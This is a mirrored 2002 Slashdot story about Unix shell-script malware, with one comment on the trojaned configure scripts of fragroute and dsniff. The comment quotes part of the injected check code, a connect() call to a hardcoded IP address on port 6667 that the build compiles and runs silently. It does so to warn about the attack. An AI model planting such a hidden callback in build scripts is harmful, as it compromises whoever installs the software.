Slashdot Mirror

← Back to Stories (view on slashdot.org)

Unix Shell-Scripting Malware

Posted by timothy on Monday June 10, 2002 @09:25AM from the one-day-it-will-get-bad dept.

sheriff_p writes: "Virus Bulletin are running an article on Unix shell scripting malware, citing a 'zeitgeist' of interest in *nix malware following the release of {Win32/Linux}/Simile.D. The article looks at possible infection methods, possible actions the virus could take, and at a couple of real-world examples..."

1 of 212 comments (clear)

Min score:

Reason:

Sort:

Re:Not that special... by btellier · 2002-06-10 11:06 · Score: 5, Interesting

>What about ./configure scripts?

Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.

What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interetsing "checks" in it:

...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) ...

It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.

You can find the full diff here.